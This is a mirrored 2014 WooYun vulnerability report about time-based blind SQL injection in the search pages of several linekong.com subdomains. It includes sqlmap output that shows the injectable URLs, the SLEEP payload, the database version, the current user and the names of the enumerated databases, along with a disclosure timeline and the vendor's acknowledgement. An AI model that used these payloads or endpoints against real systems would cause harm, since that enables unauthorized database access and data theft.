乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-26: 细节已通知厂商并且等待厂商处理中 2014-02-26: 厂商已经确认,细节仅向厂商公开 2014-03-08: 细节向核心白帽子及相关领域专家公开 2014-03-18: 细节向普通白帽子公开 2014-03-28: 细节向实习白帽子公开 2014-04-12: 细节向公众公开
球邀请码.....
http://ss.linekong.com/search.php?keyword=%27 (GET)sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: keyword Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: keyword=' AND SLEEP(5)---web application technology: Apacheback-end DBMS: MySQL 5.0.11current user: '[email protected]'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: keyword Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: keyword=' AND SLEEP(5)---web application technology: Apacheback-end DBMS: MySQL 5.0.11available databases [2]:[*] information_schema[*] ss_web
http://yb.linekong.com/search.php?keyword=%27 (GET)sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: keyword Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: keyword=' AND SLEEP(5)---web application technology: Apacheback-end DBMS: MySQL 5.0.11available databases [2]:[*] information_schema[*] yb_web
http://yt.linekong.com/search.php?keyword=%27&x=25&y=14%27&site=ss%27 (GET)sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: keyword Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: keyword=' AND SLEEP(5)&x=25&y=14'&site=ss'---web application technology: Apacheback-end DBMS: MySQL 5.0.11
跑表,表很多
求礼物
危害等级:中
漏洞Rank:8
确认时间:2014-02-26 13:38
非常感谢,正在处理中。
暂无